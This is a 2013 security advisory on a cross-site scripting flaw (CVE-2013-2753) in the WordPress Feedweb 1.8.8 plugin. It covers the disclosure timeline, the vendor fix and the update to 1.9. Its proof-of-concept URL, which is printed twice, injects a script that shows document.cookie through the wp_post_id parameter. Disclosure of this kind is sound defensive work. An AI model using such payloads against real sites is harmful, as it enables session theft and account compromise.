SSCHADV2013-004 - WordPress Plugin 'Feedweb 1.8.8' Cross-site Scripting vulnerability
Advisory:
|
WordPress Plugin ‘Feedweb 1.8.8’ Cross-site Scripting vulnerability
|
Advisory ID:
|
SSCHADV2013-004
|
Author:
|
Stefan Schurtz
|
Affected Software:
|
Successfully tested on Feedweb 1.8.8
|
Vendor URL:
|
|
Vendor Status:
|
fixed
|
CVE-ID:
|
CVE-2013-2753
|
======================
Vulnerability Description
======================
Vulnerability Description
======================
The WordPress plugin ‘Feedweb 1.8.8’ is prone to a XSS vulnerability
==============
PoC-Exploit
==============
// with authenticated admin user
http://[target]/wordpress/wp-content/plugins/feedweb/widget_remove.php?wp_post_id=</script><script>alert(document.cookie)</script>
=====
Solution
=====
Update to the latest version 1.9
================
Disclosure Timeline
================
30-Mar-2013 – informed plugins@wordpress.org
01-Apr-2013 – fixed by developer
PoC-Exploit
==============
// with authenticated admin user
http://[target]/wordpress/wp-content/plugins/feedweb/widget_remove.php?wp_post_id=</script><script>alert(document.cookie)</script>
=====
Solution
=====
Update to the latest version 1.9
================
Disclosure Timeline
================
30-Mar-2013 – informed plugins@wordpress.org
01-Apr-2013 – fixed by developer
====
Credits
====
Vulnerability found and advisory written by Stefan Schurtz.
=======
References
=======
Comments
Display comments as Linear | Threaded